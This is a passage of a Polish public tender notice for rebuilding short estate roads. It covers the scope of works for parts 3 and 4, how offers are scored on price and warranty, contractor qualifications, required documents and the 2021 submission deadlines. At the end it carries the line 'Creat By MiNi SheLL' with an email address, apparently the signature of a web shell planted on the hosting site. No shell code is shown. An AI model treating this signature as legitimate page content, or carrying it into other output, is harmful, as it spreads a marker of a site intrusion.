wykonaniu robót budowlanych – roboty drogowe realizowane na podstawie Zgłoszenia robót budowlanych na ww. zadanie realizowane w formie ryczałtowej w zakresie: <br/>1)	Długość przebudowywanego odcinka drogi o dł. 0,034 km<br/>Zakres robót obejmuje:<br/>a)	Roboty pomiarowe i inwentaryzacja geodezyjna powykonawcza oraz wznowienie prawnych granic pasa drogowego.<br/>b)	Wykonanie koryta gł. 30 cm z wywiezieniem urobku na odkład do 2km do wykorzystania na pobocza.<br/>c)	Wykonanie podsypki piaskowej gr. 10cm po zagęszczeniu.<br/>d)	Podbudowa z kruszywa łamanego 0÷31,5 mm<br/>e)	Regulacja istniejących studni i urządzeń podziemnych. <br/>f)	Skropienie podbudowy z kruszywa łamanego emulsją asfaltową w ilości 0,20-0,30 kg/m2 przed ułożeniem warstwy wiążącej.<br/>g)	Wykonanie warstwy wiążącej z betonu asfaltowego AC 16W 50/70 o grubości warstwy po zagęszczeniu 4 cm.<br/>h)	Skropienie nawierzchni emulsją asfaltową przed ułożeniem warstwy ścieralnej.<br/>i)	Wykonanie warstwy ścieralnej nawierzchni z betonu asfaltowego AC 11S 50/70 przy grubości warstwy po zagęszczeniu 4 cm.<br/>j)	Uzupełnienie poboczy kruszywem pochodzącym z korytowania drogi gr. 10 cm po zagęszczeniu.<br/>k)	Pionowe znaki drogowe.D-46 szt.1, D-47 szt.1<br/>l)	Pionowe znaki drogowe słupki do znaków Ø60. szt.1<br/>2)	Przedmiot zamówienia w zakresie szczegółowym określa dokumentacja projektowa do zgłoszenia budowy tj. <br/>a)	Załącznik nr 10 cz. 3 SWZ kosztorys ślepy/ofertowy, przedmiar robót, OPIS TECHNICZNY<br/>Plan sytuacyjny, plan sytuacyjny –oznakowanie, przekroje normalne ,Szczegółowe Specyfikacje Techniczne Odbioru i Wykonania Robót Budowlanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">215 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert jednolite dla każdej z części zamówienia.<br/>16.1.1. Kryteria oceny ofert:<br/>a) kryterium: cena (waga 60%)<br/>Kryterium ceny będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu oferty. Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/>C min<br/>C = x Zp x Wp<br/>C o<br/>gdzie:	C min	- cena brutto oferty najtańszej (spośród wszystkich złożonych ofert niepodlegających odrzuceniu)<br/>C o	- cena brutto oferty ocenianej<br/>Zp	- znaczenie procentowe kryterium, tu: 60,0%<br/>Wp	- waga punktowa kryterium, tu: 100 pkt.<br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 60,0 pkt.<br/>Punktacja będzie liczona z zaokrągleniem do dwóch miejsc po przecinku.<br/>b) kryterium: okres gwarancji (waga 40%).<br/>Kryterium okres gwarancji, będzie rozpatrywane na podstawie zadeklarowanej ilości lat (miesięcy) gwarancji na wykonany przedmiot zamówienia, podanej przez Wykonawcę w Formularzu Oferty.<br/>Zamawiający zastrzega, że minimalny okres gwarancji wynosi 3 lata (36 miesiący). Zaoferowanie terminu gwarancji krótszego niż 3 lata spowoduje odrzucenie oferty, jako niezgodnej z treścią SWZ. Najdłuższy możliwy okres gwarancji wynosi 5 lat (60 miesięcy).<br/>Punkty w kryterium „Okres gwarancji” zostaną przyznane w ten sposób, że dla terminu gwarancji 3,5 roku (42 miesiące) Wykonawca otrzyma 10 pkt., z zastrzeżeniem, że za 3 lata (36 miesięcy) gwarancji Wykonawcy nie zostaną przyznane punkty (0 pkt.), a za 5 lat (60 miesięcy) zostanie przyznanych 40 punktów.<br/>Punkty zostaną przyznane w poniższy sposób:<br/>Gwarancja (G)– waga 40 %<br/>60 miesięcy (5 lat) – 40 pkt.<br/> 54 miesięcy (4,5 roku) – 30 pkt.<br/>48 miesięcy (4 lat) – 20 pkt.	<br/>42 miesięcy (3,5 roku) – 10 pkt.<br/>36 miesięcy (3 lata)- 0 pkt. <br/>UWAGA: Jeżeli Wykonawca nie zadeklaruje żadnego okresu gwarancji, to zostanie mu przyznane 0 pkt. i Zamawiający uzna, że Wykonawca zadeklarował minimalny wymagany okres gwarancji, tj. 3 lata.<br/>Każda z części będzie oceniana odrębnie<br/>Ocena końcowa każdej oferty zostanie obliczona, jako suma punktów uzyskanych w poszczególnych kryteriach oceny ofert, na podstawie poniższego wzoru:<br/> P = C + G<br/>C – Cena<br/> G - Okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi osiedlowej „odcinek T-U” o długości 0,397 km<br/>Przedmiot zamówienia polega na wykonaniu robót budowlanych – roboty drogowe realizowane na podstawie Zgłoszenia robót budowlanych na ww. zadanie realizowane w formie ryczałtowej w zakresie: <br/>1)	Długość przebudowywanego odcinka drogi o dł. 0,397 km<br/>Zakres robót obejmuje:<br/>a)	Roboty pomiarowe i inwentaryzacja geodezyjna powykonawcza oraz wznowienie prawnych granic pasa drogowego. Trasa dróg w terenie równinnym.<br/>b)	Wykonanie koryta w gruncie kat. I-III z odłożeniem wierzchniej warstwy gr. 30cm na odl. do 10m. Warstwa z koryta do pozostawienia na odkład do wbudowania w pobocze 790,00m x 1,00m x0,15m<br/>c)	Warstwa odcinająca z piasku zagęszczana mechanicznie, grubość warstwy 10cm<br/>d)	Podbudowa z kruszywa łamanego 0/31,50mm C90/3, grubość warstwy po zagęszczeniu 20 cm <br/>e)	Regulacja pionowa studzienek kanalizacyjnych – 2szt. <br/>f)	Skropienie podbudowy z kruszywa łamanego emulsją asfaltową w ilości 0,20-0,30 kg/m2 przed ułożeniem warstwy wiążącej.<br/>g)	Nawierzchnia z mieszanek mineralno-asfaltowych AC 11 W 50/70, grub. warstwy wiążącej po zagęszczeniu 4 cm, dla KR1-2<br/>h)	Skropienie nawierzchni emulsją asfaltową przed położeniem warstwy ścieralnej.<br/>i)	Wykonanie warstwy ścieralnej nawierzchni z betonu asfaltowego AC 11S 50/70 przy grubości warstwy po zagęszczeniu 4 cm.<br/>j)	Uzupełnienie poboczy kruszywem pochodzącym z korytowania drogi gr. 15 cm i szer 1,00 m po zagęszczeniu.<br/>k)	Pionowe znaki drogowe.D-46 szt.1, D-47 szt.1<br/>l)	Pionowe znaki drogowe słupki do znaków Ø70. szt.1<br/>m)	Usunięcie 11 drzew rosnących na działce nr 308 w terminie do dnia 30.12.2021 r. z wyłączeniem okresu lęgowego ptaków. Mapa sytuacyjna usunięcia drzew stanowi Załącznik nr 11 <br/>2)	Przedmiot zamówienia w zakresie szczegółowym określa dokumentacja projektowa do zgłoszenia budowy tj. <br/>a)	Załącznik nr 10 cz. 4 SWZ kosztorys ślepy/ofertowy, przedmiar robót, OPIS TECHNICZNY<br/>Plan sytuacyjny, plan sytuacyjny –oznakowanie, przekroje normalne, Szczegółowe Specyfikacje Techniczne Odbioru i Wykonania Robót Budowlanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">215 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert jednolite dla każdej z części zamówienia.<br/>16.1.1. Kryteria oceny ofert:<br/>a) kryterium: cena (waga 60%)<br/>Kryterium ceny będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu oferty. Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/>C min<br/>C = x Zp x Wp<br/>C o<br/>gdzie:	C min	- cena brutto oferty najtańszej (spośród wszystkich złożonych ofert niepodlegających odrzuceniu)<br/>C o	- cena brutto oferty ocenianej<br/>Zp	- znaczenie procentowe kryterium, tu: 60,0%<br/>Wp	- waga punktowa kryterium, tu: 100 pkt.<br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 60,0 pkt.<br/>Punktacja będzie liczona z zaokrągleniem do dwóch miejsc po przecinku.<br/>b) kryterium: okres gwarancji (waga 40%).<br/>Kryterium okres gwarancji, będzie rozpatrywane na podstawie zadeklarowanej ilości lat (miesięcy) gwarancji na wykonany przedmiot zamówienia, podanej przez Wykonawcę w Formularzu Oferty.<br/>Zamawiający zastrzega, że minimalny okres gwarancji wynosi 3 lata (36 miesiący). Zaoferowanie terminu gwarancji krótszego niż 3 lata spowoduje odrzucenie oferty, jako niezgodnej z treścią SWZ. Najdłuższy możliwy okres gwarancji wynosi 5 lat (60 miesięcy).<br/>Punkty w kryterium „Okres gwarancji” zostaną przyznane w ten sposób, że dla terminu gwarancji 3,5 roku (42 miesiące) Wykonawca otrzyma 10 pkt., z zastrzeżeniem, że za 3 lata (36 miesięcy) gwarancji Wykonawcy nie zostaną przyznane punkty (0 pkt.), a za 5 lat (60 miesięcy) zostanie przyznanych 40 punktów.<br/>Punkty zostaną przyznane w poniższy sposób:<br/>Gwarancja (G)– waga 40 %<br/>60 miesięcy (5 lat) – 40 pkt.<br/> 54 miesięcy (4,5 roku) – 30 pkt.<br/>48 miesięcy (4 lat) – 20 pkt.	<br/>42 miesięcy (3,5 roku) – 10 pkt.<br/>36 miesięcy (3 lata)- 0 pkt. <br/>UWAGA: Jeżeli Wykonawca nie zadeklaruje żadnego okresu gwarancji, to zostanie mu przyznane 0 pkt. i Zamawiający uzna, że Wykonawca zadeklarował minimalny wymagany okres gwarancji, tj. 3 lata.<br/>Każda z części będzie oceniana odrębnie<br/>Ocena końcowa każdej oferty zostanie obliczona, jako suma punktów uzyskanych w poszczególnych kryteriach oceny ofert, na podstawie poniższego wzoru:<br/> P = C + G<br/>C – Cena<br/> G - Okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy Pzp.<br/>5.1.1 Warunek zdolności do występowania w obrocie gospodarczym – wpis do odpowiedniego rejestru.<br/>Zamawiający nie określa warunku udziału w postępowaniu dotyczącego zdolności do występowania w obrocie gospodarczym.<br/>5.1.2. Warunek posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej – zezwolenia, licencje, koncesje lub wpis do rejestru:<br/>Zamawiający nie określa warunku udziału w postępowaniu dotyczącego posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>5.1.3	Warunek dotyczący określonej sytuacji finansowej lub ekonomicznej:<br/>Zamawiający nie określa warunku udziału w postępowaniu dotyczącego określonej sytuacji finansowej lub ekonomicznej Wykonawcy.<br/>5.1.4	Warunek, dotyczący zdolności technicznej i zawodowej:<br/>Zamawiający w zakresie posiadania zdolności technicznej i zawodowej uzna warunek za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 1 świadczenia<br/>a) dla części 1 polegające na budowie, rozbudowie, przebudowie lub remoncie drogi o wartości min. 45. 000,00 zł brutto<br/>b)	dla części 2 polegające na budowie, rozbudowie lub przebudowie drogi o wartości min. 25.000,00 zł brutto <br/>c)	dla części 3 polegające na budowie, rozbudowie, przebudowie lub remoncie drogi o wartości min. 20 000,00 zł brutto <br/>d)	dla części 4 polegające na budowie, rozbudowie lub przebudowie drogi o wartości min. 80.000,00 zł brutto <br/>5.1.5	Warunek dotyczący zdolności technicznej i zawodowej, o którym mowa w 5.1.4 SWZ, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada zdolności techniczne i zawodowe i wykona roboty budowlane do których realizacji te zdolności są wymagane.<br/>5.1.6	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, o którym mowa w 5.1.4 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5.1.7 W przypadkach, o którym mowa w pkt. 5.1.5 i 5.1.6 wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy – zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – stanowiący załącznik nr 6 cz.1,2,3,4 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta winna zawierać:<br/>a)wypełniony formularz ofertowy wraz z oświadczeniem wykonawcy o wypełnieniu obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO - wg wzoru stanowiącego Załącznik nr 2 do SWZ dla cz. 1, 2, 3,4 <br/>b)oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (dalej jako ustawa Pzp) dotyczące spełniania warunków udziału w postępowaniu, wg wzoru stanowiącego Załącznik nr 3 do SWZ; dla cz. 1, 2, 3,4<br/>c)Oświadczenie podmiotu, udostępniającego zasoby, składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (dalej jako ustawa Pzp) dotyczące spełniania warunków udziału w postępowaniu, wg wzoru stanowiącego Załącznik nr 3a do SWZ; dla cz. 1, 2, 3,4..<br/>d)oświadczenie Wykonawcy, składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (dalej jako ustawa Pzp) dotyczące przesłanek wykluczenia z postępowania, wg wzoru stanowiącego Załącznik nr 4 do SWZ; dla cz. 1, 2, 3,4. <br/>e)Oświadczenie podmiotu, udostępniającego zasoby, składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (dalej jako ustawa Pzp) dotyczące przesłanek wykluczenia z postępowania, wg wzoru stanowiącego Załącznik nr 4a do SWZ; dla cz. 1, 2, 3,4. <br/>f)w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy – zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ. dla cz. 1, 2, 3,4<br/>g)wypełniony Formularz cenowy/Kosztorys ofertowy – zgodnie z wzorem załącznika Nr 10, dla cz. 1, 2, 3,4<br/>h)zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia zgodnie ze wzorem Załącznika nr 7 do SWZ-dla cz. 1, 2, 3,4<br/>i)zastrzeżenie nieudostępniania informacji stanowiących tajemnicę przedsiębiorstwa, zgodnie ze wzorem Załącznika nr 8 do SWZ (jeżeli Wykonawca zastrzega informacje stanowiące tajemnicę przedsiębiorstwa); dla cz. 1, 2, 3,4<br/>j)Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo, o ile sposób reprezentacji wskazany w pełnomocnictwie (lider) uległ zmianie w stosunku do pełnomocnictwa złożonego wraz z ofertą. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia Umowy. Pełnomocnictwo winno być załączone w formie oryginału lub kopii uwierzytelnionej przez notariusza.<br/>k) Pełnomocnictwo do podpisania oferty (oryginał lub notarialnie poświadczona kopia), względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile nie zostało złożone wraz z ofertą lub jeśli prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie przesłanek, o których mowa w pkt. 6 SWZ.<br/>3.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w pkt. 8.1. SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje brak podstaw wykluczenia.<br/>4.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie dotyczące wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO, zawarte w formularzu oferty podpisuje każdy z Wykonawców.<br/>5. Kopie dokumentów dotyczących wykonawców wspólnie ubiegających się o udzielenie zamówienia, muszą być poświadczone za zgodność z oryginałem przez wykonawcę wspólnie ubiegającego się o udzielenie zamówienia, w zakresie dokumentów, które każdego z nich dotyczą. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w projekcie/wzorze Umowy, stanowiącym Załącznik nr 9 cz. 1, 2, 3,4 do SWZ.<br/>1.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>2.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 9 cz. 1, 2, 3,4 do SWZ.<br/>3. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-30 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com